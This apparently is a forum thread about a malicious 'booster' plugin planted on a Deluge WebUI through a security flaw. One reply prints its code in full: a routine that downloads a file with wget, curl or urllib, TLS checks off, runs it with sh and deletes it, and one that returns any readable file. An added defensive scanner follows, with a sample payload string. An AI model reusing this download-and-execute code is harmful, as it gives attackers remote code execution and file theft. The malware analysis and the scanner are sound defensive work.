[WebUI Vulnerability] Malicious plugin "booster" found on my system
Admin Edit: Upgrade to 1.3.15 to fix this vulnerability
I don't remember adding this plugin called booster. It was enabled under my plugins. I have uploaded the booster.egg here. Keep in mind that an .egg file can be opened as a .zip file... I can't find a reference to this plugin ANYWHERE on the internet. Sorry if I'm being paranoid. I looked at the source and it seems to download and execute stuff :S
I am running deluge/deluge-web on Raspbian
https://drive.google.com/file/d/0B23kWK ... sp=sharing
Re: Malicious plugin "booster" found on my system?
If your webui is open to the internet, it likely is a malicious egg utilising a known security flaw.
Upgrade to 1.3.15 as it has webui security fixes.
Re: Malicious plugin "booster" found on my system?
Also you should report this to debian as a serious security issue
Re: Malicious plugin "booster" found on my system?
It is definitely malicious; it is modified Execute plugin code.
Re: Malicious plugin "booster" found on my system?
My bad, I misunderstood, thought it was Boost.Python. Don't know why. My bad.
Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system
Oh sh!t, didn't expect it to be this bad... any idea what it might have downloaded? Are there any paths that I can check?
Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system
There is likely no way to know for sure.
For reference, this is a partial summary of the code added to the Execute plugin (indentation restored, the imports it relies on added, and the Python 2 octal literal 0555 written as 0o555 so the file parses on Python 3 as well; the logic is otherwise as posted):

```python
import os
import sys
import tempfile
import time
from subprocess import Popen, PIPE

def looking_file(name):
    # Find an executable called `name` on PATH, or None if absent.
    epath = os.environ.get("PATH", None)
    # As posted: the fallback is a tuple, so .split(":") would raise if PATH were unset.
    if not epath: epath = ("/usr/bin", "/usr/local/bin", "/usr/sbin", "/sbin", "/bin")
    for p in epath.split(":"):
        testname = p + "/" + name
        if os.path.exists(testname) and os.access(testname, os.X_OK):
            return testname
    return None

def internal_download(url, to):
    # Pure-Python fallback downloader used when neither wget nor curl is installed.
    if sys.version_info[0] == 3:
        import urllib.request
        urllib.request.urlretrieve(url, to)
    else:
        import urllib
        urllib.urlretrieve(url, to)

def yahoo(URL):
    # Download URL to a temp file (wget, else curl, else urllib), with TLS
    # certificate checks disabled, then run it with sh in the background
    # and delete it two seconds later.
    wget = looking_file("wget")
    curl = looking_file("curl")
    cmd = None
    if wget:
        cmd = wget + " -t 0 -T 15 -q --no-check-certificate -O %s %s"
    elif curl:
        cmd = curl + " --retry 0 --connect-timeout 15 -k -q -o %s %s "
    tmpfile = tempfile.mkstemp()
    tmpname = tmpfile[1]
    os.fdopen(tmpfile[0]).close()
    if cmd:
        try:
            tcmd = cmd % (tmpname, URL)
            Popen(tcmd, shell = True, stdout = PIPE, stderr = PIPE).communicate()
        except:
            pass
    else:
        try:
            if not os.path.exists(tmpname) or os.path.getsize(tmpname) == 0:
                internal_download(URL, tmpname)
        except Exception as err:
            return str(err)
    if os.path.exists(tmpname) and os.path.getsize(tmpname) > 0:
        try:
            os.chmod(tmpname, 0o555)  # 0555 in the original Python 2 source
            Popen("sh %s &" % tmpname, shell = True, stdout = PIPE, stderr = PIPE).communicate()
            time.sleep(2)
            os.remove(tmpname)
        except Exception as err:
            return str(err)
    return "OK"

def get_file(self, filename):
    # A method on the plugin's core class in the original (hence `self`):
    # returns the contents of any file the daemon can read.
    if os.path.exists(filename):
        fp = open(filename)
        data = fp.read()
        fp.close()
        return data
    else:
        return "FILE %s not exists" % filename
```
Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system
How do you remove this malware?
Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system
eb98jdb wrote: How do you remove this malware?
I am not sure on this as I have never had the issue, but on my system plugins are saved in
/home/[USER NAME]/.config/deluge/plugins
and also
/home/[USER NAME]/.cache/Python-Eggs/
I would shut down deluge and remove them from there as a first step.
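A triage script for the two questions raised in this thread ("are there any paths that I can check?" and "how do you remove this malware?"), written here as an added example; it is not part of the thread, not Deluge's code, and not the booster plugin. It walks the two directories named in the reply above, opens each .egg as a zip (as the first post notes is possible), and greps every .py member for the behaviours visible in the quoted code: a wget/curl lookup, TLS verification switched off, shell=True, urlretrieve, chmod followed by "sh file", and a delete afterwards. The indicator list, the threshold of three hits per module, and the sample egg names and contents are my assumptions, constructed for the demo; the "bad" sample is only ever read as text, never executed.

```python
import os
import re
import tempfile
import zipfile

# Directories named in the thread where Deluge 1.3.x keeps user-installed
# plugin eggs and the cache where they are unpacked (~ is expanded at run time).
DEFAULT_PLUGIN_DIRS = ["~/.config/deluge/plugins", "~/.cache/Python-Eggs"]

# Indicators lifted from the quoted booster code. Assumption: a single module
# hitting MIN_HITS or more distinct indicators is flagged as suspicious.
INDICATORS = [
    ("wget/curl lookup", re.compile(r"""['"](wget|curl)['"]""")),
    ("tls check disabled", re.compile(r"--no-check-certificate|\s-k\s")),
    ("shell=True", re.compile(r"shell\s*=\s*True")),
    ("urlretrieve", re.compile(r"urlretrieve\s*\(")),
    ("chmod then exec", re.compile(r"os\.chmod\s*\(")),
    ("run downloaded file", re.compile(r"""Popen\s*\(\s*['"]sh\s""")),
    ("delete after run", re.compile(r"os\.remove\s*\(")),
]
MIN_HITS = 3

def find_indicators(src):
    """Return the sorted names of every indicator that matches the source text."""
    return sorted(name for name, rx in INDICATORS if rx.search(src))

def scan_egg(path):
    """Open an .egg as a zip and scan each .py member.
    Returns {member name: [indicator names]} for members with at least one hit."""
    hits = {}
    with zipfile.ZipFile(path) as zf:
        for member in zf.namelist():
            if member.endswith(".py"):
                found = find_indicators(zf.read(member).decode("utf-8", "replace"))
                if found:
                    hits[member] = found
    return hits

def is_suspicious(hits, min_hits=MIN_HITS):
    """Flag when one module alone carries min_hits or more distinct indicators."""
    return any(len(found) >= min_hits for found in hits.values())

def scan_dirs(dirs=DEFAULT_PLUGIN_DIRS):
    """Walk the plugin directories: eggs are opened as zips, loose .py files
    (the unpacked copies under Python-Eggs) are scanned directly.
    Returns a list of (path, hits, suspicious)."""
    results = []
    for d in dirs:
        for root, _subdirs, files in os.walk(os.path.expanduser(d)):
            for fn in files:
                p = os.path.join(root, fn)
                if fn.endswith(".egg") and zipfile.is_zipfile(p):
                    hits = scan_egg(p)
                elif fn.endswith(".py"):
                    with open(p, "rb") as f:
                        found = find_indicators(f.read().decode("utf-8", "replace"))
                    hits = {p: found} if found else {}
                else:
                    continue
                results.append((p, hits, is_suspicious(hits)))
    return results

# Constructed sample data, not real artifacts. BAD_SNIPPET mirrors the quoted
# booster routine; it is stored as text inside a zip and never executed.
BENIGN_SNIPPET = '''
from deluge.plugins.init import PluginInitBase
class CorePlugin(PluginInitBase):
    def __init__(self, plugin_name):
        super(CorePlugin, self).__init__(plugin_name)
'''
BAD_SNIPPET = '''
import os, tempfile
from subprocess import Popen, PIPE
def fetch_and_run(URL):
    cmd = looking_file("wget") + " -q --no-check-certificate -O %s %s"
    tmp = tempfile.mkstemp()[1]
    Popen(cmd % (tmp, URL), shell = True, stdout = PIPE, stderr = PIPE).communicate()
    os.chmod(tmp, 0o555)
    Popen("sh %s &" % tmp, shell = True).communicate()
    os.remove(tmp)
'''

def build_sample_tree(base):
    """Create <base>/.config/deluge/plugins holding one benign and one
    booster-like egg (constructed names) and return that plugin directory."""
    plugdir = os.path.join(base, ".config", "deluge", "plugins")
    os.makedirs(plugdir)
    with zipfile.ZipFile(os.path.join(plugdir, "Label-1.0-py2.7.egg"), "w") as zf:
        zf.writestr("label/__init__.py", BENIGN_SNIPPET)
    with zipfile.ZipFile(os.path.join(plugdir, "booster-1.0-py2.7.egg"), "w") as zf:
        zf.writestr("booster/__init__.py", BENIGN_SNIPPET)
        zf.writestr("booster/core.py", BAD_SNIPPET)
    return plugdir

def demo():
    """Scan the constructed tree in a temp dir; return {egg name: suspicious?}."""
    plugdir = build_sample_tree(tempfile.mkdtemp())
    return {os.path.basename(p): bad for p, _hits, bad in scan_dirs([plugdir])}

if __name__ == "__main__":
    for path, hits, bad in scan_dirs():  # the real Deluge directories, if present
        print("SUSPICIOUS" if bad else "ok", path, hits)
    print(demo())  # constructed sample: booster egg flagged, Label egg clean
```

Run it as the user that runs deluged (the plugin directories are per user), with Deluge stopped, before deleting anything, so the flagged egg and its unpacked copy can be kept for the report to Debian that an earlier reply suggests. A clean result from this script only means none of these particular strings were found; it says nothing about what the downloaded shell script itself did once it ran.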